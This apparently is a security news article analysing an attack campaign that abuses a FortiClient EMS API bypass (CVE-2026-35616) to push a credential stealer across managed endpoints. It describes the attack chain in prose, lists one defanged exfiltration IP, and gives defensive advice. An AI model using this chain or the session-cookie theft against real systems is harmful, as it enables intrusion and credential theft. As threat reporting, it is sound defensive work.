Endpoint management tools are supposed to be the immune system of a corporate network. This month, threat actors flipped that idea on its head — using FortiClient EMS itself as the delivery mechanism for a credential stealer disguised as a Fortinet patch. If the platform you trust to push updates becomes the platform pushing malware, your perimeter isn’t your firewall anymore. It’s whoever holds the management console.
Arctic Wolf disclosed in late May 2026 that attackers are actively weaponizing CVE-2026-35616, a critical pre-authentication API bypass in FortiClient Endpoint Management Server, to silently fan malicious PowerShell out to every managed endpoint. The flaw carries a CVSS score of 9.1 and was patched by Fortinet in FortiClient EMS 7.4.7. The campaign is a textbook case of why the security industry’s obsession with endpoint agents has created a new class of single points of failure.
Why a Management Server Bug Is Worse Than a Workstation Bug
According to Arctic Wolf, CVE-2026-35616 is a pre-authentication API access bypass that leads to privilege escalation. Once exploited, attackers modify EMS configurations — including deferring firmware upgrade reminders and tampering with Remote Access Profile settings and endpoint policy — to inject a malicious script into the normal management flow.
The bug itself isn’t the issue; it’s where it sits. Endpoint management servers sit above individual workstations in the trust hierarchy. A typical RCE on a laptop compromises one user. An RCE on the system that controls every laptop compromises the fleet. As Arctic Wolf put it, “every managed endpoint became a potential execution target without requiring a separate intrusion path to each device.”
If you’re a mid-sized enterprise with a few thousand EMS-managed endpoints, this means a single unpatched server is operationally equivalent to a few thousand simultaneous intrusions — without any of them tripping the lateral-movement detections your SOC is tuned for. The traffic looks like management traffic, because it is management traffic.
The take: vendor management consoles are going to become the most heavily targeted asset class of 2026 and 2027. They’re internet-adjacent, they’re privileged, and they’re often under-monitored because security teams treat them as infrastructure rather than as attack surface.
How the Attack Chain Turns Trusted Binaries Against You
The execution chain Arctic Wolf documented is a clinic in living-off-the-land. After exploiting the EMS API, attackers use fortitray.exe — a legitimate FortiClient executable — to launch a .cmd script via cmd.exe. The script then invokes a Base64-encoded PowerShell payload that downloads the malware, runs it, and exfiltrates results to 83.138.53[.]110 over an HTTP POST.
This matters because almost every detection engineer has spent the past five years writing rules to flag suspicious PowerShell, suspicious cmd.exe invocations, and suspicious child processes of Office. Very few have written rules for suspicious child processes of fortitray.exe. Trusted vendor binaries are an allowlist blind spot, and adversaries know it.
Imagine you’re running an EDR that auto-tunes itself based on prevalence. A FortiClient binary launching cmd.exe will show up as common across your fleet — because FortiClient is, by definition, common across your fleet. The behavior gets baselined as normal before anyone notices it shouldn’t be. That’s the entire game.
The take: behavioral baselining is going to need a new tier specifically for security-vendor binaries, because attackers have figured out that “trusted parent process” is the cheapest bypass on the market.
What the EKZ Infostealer Actually Steals
The payload itself — FortiEndpoint_Patch.exe — is, per Arctic Wolf, a previously unreported Windows information stealer. It harvests passwords, cookies, autofill data, credit card information, addresses, and phone numbers from Chromium- and Gecko-based browsers, writes the haul to a log file in ProgramData, and relies on the dropper PowerShell script to send everything to the attacker-controlled IP. The stealer itself has no network exfiltration capability — it keeps the binary’s behavior boring enough to dodge network-based detections on the endpoint itself.
The real risk isn’t the credit card data. It’s the session cookies. Arctic Wolf explicitly warns that “session cookies and saved browser credentials may provide threat actors with follow-on access to cloud services, internal applications, and other authenticated resources, including cases where session reuse may circumvent MFA prompts.”
If you’re a security team that spent the past three years rolling out MFA on every SaaS app and feeling good about it, this is the part that should sting. Stolen session tokens replay through your IdP without triggering a second factor. The attacker doesn’t need your password — they have your already-authenticated session. This is the same primitive that’s been hitting industries where regulated access matters most, from finance to healthcare platforms handling patient records, where a single replayed session can blow open data sets that should never leave a controlled environment.
The take: token theft is the new password theft, and any security team still measuring “MFA coverage” instead of “session lifetime and binding” is fighting the last war.
What Engineering and Security Teams Should Actually Do This Week
The immediate action is obvious: upgrade to FortiClient EMS 7.4.7 or later. But the more interesting work is structural. Treat EMS — and every other privileged management console — like a tier-zero asset. Restrict its API surface to known administrative networks. Alert on any configuration change to Remote Access Profiles or endpoint policy that wasn’t ticketed. Hunt for fortitray.exe spawning cmd.exe or PowerShell across your fleet.
For anyone building or buying software where audit trails are non-negotiable — supply chain platforms, healthcare records, financial systems — the integrity of administrative changes deserves the same scrutiny as the data those changes affect. The attackers in this case didn’t just compromise endpoints; they rewrote policy. If your platform can’t tell you who changed what, when, and whether the change matched a legitimate workflow, you’re one CVE away from being in Arctic Wolf’s next writeup.
FAQ
Q: What is CVE-2026-35616? A: CVE-2026-35616 is a critical pre-authentication API access bypass in FortiClient Endpoint Management Server with a CVSS score of 9.1. Successful exploitation lets an unauthenticated attacker escalate privileges and modify EMS configuration, which can then be used to push commands to every managed endpoint. Fortinet patched it in FortiClient EMS 7.4.7.
Q: How do attackers deliver malware through FortiClient EMS?
A: According to Arctic Wolf, attackers exploit the API bypass to modify Remote Access Profiles and endpoint policy, inserting a malicious script that executes through FortiClient’s own management pathway. They then use the legitimate fortitray.exe binary to launch cmd.exe, which runs a Base64-encoded PowerShell script that downloads an information stealer disguised as FortiEndpoint_Patch.exe.
Q: Why is session cookie theft a bigger deal than password theft? A: Session cookies represent an already-authenticated user, so replaying them often bypasses MFA prompts entirely. Arctic Wolf notes that stolen cookies can grant follow-on access to cloud services and internal applications, even where MFA is enforced for fresh logins. That makes session token theft a more reliable path to lateral movement than credential phishing.
Key Takeaways
- Treat every privileged management console — EMS, MDM, RMM, CI/CD — as a tier-zero asset with its own dedicated monitoring, not as background infrastructure.
- Build detections specifically for trusted security-vendor binaries spawning shells; allowlisting parent processes is now an attacker technique, not a defender shortcut.
- Shift your authentication posture from “MFA coverage” to short-lived, device-bound sessions, because infostealers are turning cookie theft into MFA-bypass-as-a-service.
- Alert on configuration changes to endpoint policies and remote access profiles the same way you alert on changes to firewall rules — they’re equivalent in blast radius.
- Expect more campaigns in 2026 that exploit endpoint management platforms as a fan-out mechanism; one server breach scaling to thousands of managed endpoints is too good an ROI to pass up.